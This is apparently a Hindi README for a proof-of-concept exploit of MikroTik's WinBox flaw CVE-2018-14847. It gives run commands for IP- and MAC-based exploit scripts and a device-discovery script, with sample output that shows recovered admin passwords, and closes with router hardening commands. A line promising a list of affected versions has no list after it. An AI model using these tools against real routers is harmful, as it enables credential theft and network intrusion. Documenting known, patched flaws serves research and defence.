
Winbox गंभीर भेद्यता (CVE-2018-14847) के लिए प्रूफ ऑफ कॉन्सेप्ट
यह महत्वपूर्ण WinBox भेद्यता (CVE-2018-14847) का एक प्रूफ ऑफ कॉन्सेप्ट है, जो सादे पाठ पासवर्ड की मनमानी फ़ाइल पढ़ने की अनुमति देता है।
यह भेद्यता बहुत पहले ठीक कर दी गई है, इसलिए यह परियोजना समाप्त हो गई है और अब समर्थित या अपडेट नहीं की जाएगी। आप इसका फोर्क कर सकते हैं और स्वयं इसे अपडेट कर सकते हैं।
https://n0p.me/winbox-bug-dissection/
स्क्रिप्ट का उपयोग कमांडलाइन में सरल तर्कों के साथ किया जाता है।
भेद्यता का शोषण करें और पासवर्ड पढ़ें।
python3 WinboxExploit.py <IP-ADDRESS> [PORT]
उदाहरण:
$ python3 WinboxExploit.py 172.17.17.17
Connected to 172.17.17.17:8291
Exploit successful
User: admin
Pass: Th3P4ssWord
आप फ़ाइलें तब भी निकाल सकते हैं जब डिवाइस के पास IP पता न हो।
स्थानीय रूप से जुड़े Mikrotik डिवाइसों के लिए सरल डिस्कवरी जाँच।
python3 MACServerDiscover.py
उदाहरण:
$ python3 MACServerDiscover.py
Looking for Mikrotik devices (MAC servers)
aa:bb:cc:dd:ee:ff
aa:bb:cc:dd:ee:aa
भेद्यता का शोषण करें और पासवर्ड पढ़ें।
python3 MACServerExploit.py <MAC-ADDRESS>
उदाहरण:
$ python3 MACServerExploit.py aa:bb:cc:dd:ee:ff
User: admin
Pass: Th3P4ssWord
2015-05-28 से 2018-04-20 तक के सभी RouterOS संस्करण इस शोषण के लिए संवेदनशील हैं।
Mikrotik डिवाइस जो निम्नलिखित RouterOS संस्करण चला रहे हैं:
अधिक जानकारी के लिए देखें: https://blog.mikrotik.com/security/winbox-vulnerability.html
/ip service set winbox address=10.0.0.0/8,172.16.0.0/12,192.168.0.0/16
/ip firewall filter add chain=input in-interface=wan protocol=tcp dst-port=8291 action=drop
/tool mac-server mac-winbox